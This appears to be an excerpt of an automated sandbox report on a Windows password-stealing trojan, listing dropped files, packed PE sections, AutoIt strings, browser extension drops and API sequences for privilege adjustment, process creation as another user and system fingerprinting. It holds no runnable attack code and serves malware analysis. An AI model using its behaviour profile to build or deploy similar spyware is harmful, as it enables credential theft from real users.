Source: 3kaNpKWTvXjwLZn_llOJ.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_af6417ab-e

Downloads suspicious files via Chrome

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir8540_1048523084\CRX_INSTALL\page_embed_script.js	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir8540_1048523084\CRX_INSTALL\eventpage_bin_prod.js	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir8540_572651988\CRX_INSTALL\content.js	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir8540_572651988\CRX_INSTALL\content_new.js	Jump to dropped file

PE file has nameless sections

Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0067D5EB: CreateFileW,DeviceIoControl,CloseHandle,

16_2_0067D5EB

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_00671201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

16_2_00671201

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0067E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

16_2_0067E8F6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422020	2_2_00422020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00412090	2_2_00412090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004D2220	2_2_004D2220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00426340	2_2_00426340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00470310	2_2_00470310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004533E0	2_2_004533E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004463F0	2_2_004463F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041F380	2_2_0041F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043B460	2_2_0043B460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004354B0	2_2_004354B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004444B0	2_2_004444B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044A530	2_2_0044A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0046D5A0	2_2_0046D5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402670	2_2_00402670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043460C	2_2_0043460C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419620	2_2_00419620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004736E0	2_2_004736E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00453690	2_2_00453690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042E780	2_2_0042E780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040E8C0	2_2_0040E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005078DD	2_2_005078DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A78E0	2_2_004A78E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004648F0	2_2_004648F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00448A20	2_2_00448A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00440AA0	2_2_00440AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044CAA0	2_2_0044CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00450BD0	2_2_00450BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044ABE0	2_2_0044ABE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0046CBF0	2_2_0046CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A8C70	2_2_004A8C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00442C20	2_2_00442C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00478CA0	2_2_00478CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040FCB0	2_2_0040FCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433D40	2_2_00433D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043BD50	2_2_0043BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00430D10	2_2_00430D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00457E00	2_2_00457E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00437EE0	2_2_00437EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004E7EF0	2_2_004E7EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044BEA0	2_2_0044BEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049DF60	2_2_0049DF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00414F70	2_2_00414F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042BF1C	2_2_0042BF1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00465F20	2_2_00465F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A7FD0	2_2_004A7FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004C0060	2_2_004C0060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A00B0	2_2_004A00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004DD160	2_2_004DD160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A5110	2_2_004A5110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005021DA	2_2_005021DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00405260	2_2_00405260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00504210	2_2_00504210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004BB210	2_2_004BB210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043E230	2_2_0043E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A2E0	2_2_0041A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004B0290	2_2_004B0290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0051B361	2_2_0051B361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B310	2_2_0040B310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00423330	2_2_00423330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004B73E0	2_2_004B73E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004AB477	2_2_004AB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402400	2_2_00402400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00515409	2_2_00515409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004EE420	2_2_004EE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A3425	2_2_004A3425
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422020	2_2_00422020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A24B0	2_2_004A24B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0051D510	2_2_0051D510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004AC500	2_2_004AC500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049E590	2_2_0049E590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A7590	2_2_004A7590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00476650	2_2_00476650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A3675	2_2_004A3675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422620	2_2_00422620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004B6720	2_2_004B6720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004637C0	2_2_004637C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049D7C0	2_2_0049D7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A87C0	2_2_004A87C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049C7BA	2_2_0049C7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409850	2_2_00409850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A810	2_2_0041A810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004FE8C0	2_2_004FE8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401900	2_2_00401900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049F980	2_2_0049F980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C9B5	2_2_0040C9B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040BA50	2_2_0040BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A8A60	2_2_004A8A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A1A00	2_2_004A1A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00465AE1	2_2_00465AE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043AB10	2_2_0043AB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0045EBFB	2_2_0045EBFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422BB8	2_2_00422BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A2C60	2_2_004A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0045EC05	2_2_0045EC05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00507C1F	2_2_00507C1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00452C10	2_2_00452C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004F0C90	2_2_004F0C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A7D60	2_2_004A7D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004AFD80	2_2_004AFD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004ABDA0	2_2_004ABDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00465E40	2_2_00465E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004EFEC0	2_2_004EFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A6EA0	2_2_004A6EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049EF00	2_2_0049EF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004EAF30	2_2_004EAF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004A9F81	2_2_004A9F81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00516FA9	2_2_00516FA9
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00618060	16_2_00618060
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00682046	16_2_00682046
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00678298	16_2_00678298
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0064E4FF	16_2_0064E4FF
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0064676B	16_2_0064676B
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006A4873	16_2_006A4873
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0061CAF0	16_2_0061CAF0
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0063CAA0	16_2_0063CAA0
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0062CC39	16_2_0062CC39
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00646DD9	16_2_00646DD9
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0062B119	16_2_0062B119
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006191C0	16_2_006191C0
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00631394	16_2_00631394
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0063781B	16_2_0063781B
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0062997D	16_2_0062997D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00617920	16_2_00617920
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00637A4A	16_2_00637A4A
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00637CA7	16_2_00637CA7
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0069BE44	16_2_0069BE44
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00649EEE	16_2_00649EEE
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0061BF40	16_2_0061BF40

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: String function: 00630A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: String function: 0062F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: String function: 00619CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: String function: 00E242AC appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004FBAB0 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00486E40 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004ABB20 appears 97 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 2376

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000000.2080019976.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameControl.exe0 vs SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVBoxExtPackHelperAppJ vs SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000002.2084222914.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Binary or memory string: OriginalFilenameControl.exe0 vs SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: autorun[1].exe.46.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: autorun.exe.46.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: amer[1].exe.2.dr	Static PE information: Section: ZLIB complexity 0.9980332167832168
Source: amer[1].exe.2.dr	Static PE information: Section: ZLIB complexity 0.9953567216981132
Source: amer[1].exe.2.dr	Static PE information: Section: ZLIB complexity 0.9950520833333333
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9980332167832168
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9953567216981132
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9950520833333333
Source: explorhe.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9980332167832168
Source: explorhe.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9953567216981132
Source: explorhe.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9950520833333333

Source: autorun[1].exe.46.dr, AaKKpFYFlTUg6do124.cs	Cryptographic APIs: 'CreateDecryptor'
Source: autorun[1].exe.46.dr, AaKKpFYFlTUg6do124.cs	Cryptographic APIs: 'CreateDecryptor'
Source: autorun.exe.46.dr, AaKKpFYFlTUg6do124.cs	Cryptographic APIs: 'CreateDecryptor'
Source: autorun.exe.46.dr, AaKKpFYFlTUg6do124.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@160/856@163/45

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004AE130 GetLastError,GetVersionExA,FormatMessageW,LocalFree,FormatMessageA,

2_2_004AE130

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006710BF AdjustTokenPrivileges,CloseHandle,		16_2_006710BF
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		16_2_006716C3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004ADA60 GetVersionExA,CreateFileW,CreateFileA,GetDiskFreeSpaceW,GetDiskFreeSpaceA,

2_2_004ADA60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FCB0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,

2_2_0040FCB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041AC60 CoInitializeEx,CoCreateInstance,RegCreateKeyExA,RegCreateKeyExA,RegCreateKeyExA,RegCreateKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegCreateKeyExA,CoUninitialize,

2_2_0041AC60

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_006142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

16_2_006142A2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

